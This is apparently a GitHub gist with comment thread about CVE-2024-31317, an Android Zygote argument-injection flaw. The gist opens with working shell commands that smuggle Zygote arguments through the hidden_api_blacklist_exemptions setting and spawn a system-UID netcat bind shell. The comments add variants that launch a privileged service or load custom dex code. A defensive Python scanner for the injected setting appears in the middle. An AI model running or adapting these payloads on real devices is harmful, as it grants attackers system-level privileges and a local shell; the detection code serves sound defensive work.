@ybtag
Created January 8, 2025 19:43
CVE-2024-31317
am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
am start -a android.settings.SETTINGS
nc localhost 1234
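The gist above works because the Zygote command socket reads one argument per line, so a newline inside the `hidden_api_blacklist_exemptions` value turns the rest of the setting into a second Zygote command. A defender-side triage check for that setting follows; it is an added example and is not code from the gist, its author, or AOSP. It assumes the value was pulled from a device with `adb shell settings get global hidden_api_blacklist_exemptions` (the `get` counterpart of the `settings put` used above) and piped in on stdin; the marker list and the two sample values are constructed for this example.

```python
import json
import sys

# Zygote command-line markers that never belong in a legitimate
# hidden_api_blacklist_exemptions value (which is a single line of
# comma-separated member signatures such as "Lcom/foo/Bar;->baz(I)V").
# Constructed list for this example, drawn from the argument names a
# Zygote spawn request uses.
ZYGOTE_ARG_MARKERS = (
    "--runtime-args",
    "--setuid=",
    "--setgid=",
    "--setgroups=",
    "--seinfo=",
    "--invoke-with",
    "--nice-name=",
    "--package-name=",
    "--app-data-dir=",
)


def scan_exemptions(value):
    """Inspect one hidden_api_blacklist_exemptions value and return a report.

    Fields: suspicious (bool), reasons (list of str), argc_claimed (the count
    line after the first newline, or None), argv (the argument lines that
    follow it) and invoke_with (the wrapper handed to --invoke-with, or None).
    """
    report = {"suspicious": False, "reasons": [], "argc_claimed": None,
              "argv": [], "invoke_with": None}
    # `settings get` prints "null" when the key has never been set.
    if value is None or value.strip() in ("", "null"):
        return report

    lines = value.split("\n")
    if len(lines) > 1:
        # A newline is the injection itself: Zygote treats the line after it
        # as the argument count of a fresh command, then reads that many lines.
        report["suspicious"] = True
        report["reasons"].append("newline in value: embedded Zygote command")
        try:
            report["argc_claimed"] = int(lines[1].strip())
        except ValueError:
            report["reasons"].append("second line is not an argument count")
        argv = lines[2:]
        while argv and argv[-1].strip() == "":   # drop the trailing newline
            argv.pop()
        report["argv"] = argv
        if report["argc_claimed"] is not None and report["argc_claimed"] != len(argv):
            report["reasons"].append("claimed %d args, found %d lines"
                                     % (report["argc_claimed"], len(argv)))
        if "--invoke-with" in argv:
            i = argv.index("--invoke-with")
            if i + 1 < len(argv):
                report["invoke_with"] = argv[i + 1]

    found = [m for m in ZYGOTE_ARG_MARKERS if m in value]
    if found:
        report["suspicious"] = True
        report["reasons"].append("Zygote argument markers present: " + ", ".join(found))
    return report


# Constructed samples so the script runs stand-alone (not captured from a device).
BENIGN_VALUE = "Landroid/foo/Bar;->baz(I)V,Landroid/foo/Bar;->qux()V"
INJECTED_VALUE = "\n".join([
    "LClass1;->method1(",        # looks like the start of a signature
    "5",                         # Zygote argument count
    "--runtime-args",
    "--setuid=1000",
    "--invoke-with",
    "EXAMPLE_WRAPPER_COMMAND;",  # placeholder for whatever wrapper was injected
    "android.app.ActivityThread",
    "",                          # trailing newline before the closing quote
])

if __name__ == "__main__":
    # Usage: adb shell settings get global hidden_api_blacklist_exemptions | python3 scan.py
    value = sys.stdin.read() if not sys.stdin.isatty() else INJECTED_VALUE
    print(json.dumps(scan_exemptions(value), indent=2))
```

A benign value is exactly one line with no `--` arguments, so both checks stay quiet on it. When the report is suspicious, the `invoke_with` field and `--nice-name` value tell you what was wrapped and what the spawned process called itself, and `settings delete global hidden_api_blacklist_exemptions` clears the persisted payload so the next Settings launch does not replay it.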
@yash-srivastava

@Bonveio yes we have to execute this exploit with shell access (UID:2000), which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize its benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back and forth communication using this exploit but I am not able to figure out.

@Bonveio

Bonveio commented Apr 11, 2025

> @Bonveio yes we have to execute this exploit with shell access (UID:2000), which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize its benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back and forth communication using this exploit but I am not able to figure out.

This is way beyond my knowledge. I'm sorry, I might not be able to help you with that matter, but I'm happy if I can test the custom application you're trying to build so I can report or suggest something that might be helpful on your development.

@yash-srivastava

For example if I do something like this

settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
am start-foreground-service -n com.user.helloworld/.PrivilegedService;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"

Then the Settings app crashes on opening, and the command `am start-foreground-service -n com.user.helloworld/.PrivilegedService;` present in --invoke-with doesn't get invoked properly.

@yash-srivastava

Following this - https://blog.flanker017.me/cve-2024-31317/
I tried to do something like this

settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
18
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=hello_world_zygote
--seinfo=platform:system_app:targetSdkVersion=29:complete
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
com.android.internal.os.WrapperInit
0
29
-cp
/data/local/tmp/classes.dex
com.test.user.helloworld.WrapperCustom
"

But it is throwing an "Already cached" exception:

java.lang.IllegalStateException: Already cached.
    at android.app.ApplicationLoaders.createAndCacheNonBootclasspathSystemClassLoaders(ApplicationLoaders.java:148)
    at com.android.internal.os.ZygoteInit.cacheNonBootClasspathClassLoaders(ZygoteInit.java:374)
    at com.android.internal.os.ZygoteInit.preload(ZygoteInit.java:144)
    at com.android.internal.os.WrapperInit.main(WrapperInit.java:83)
    at java.lang.reflect.Method.invoke(Native Method)
    at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492)
    at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:930)
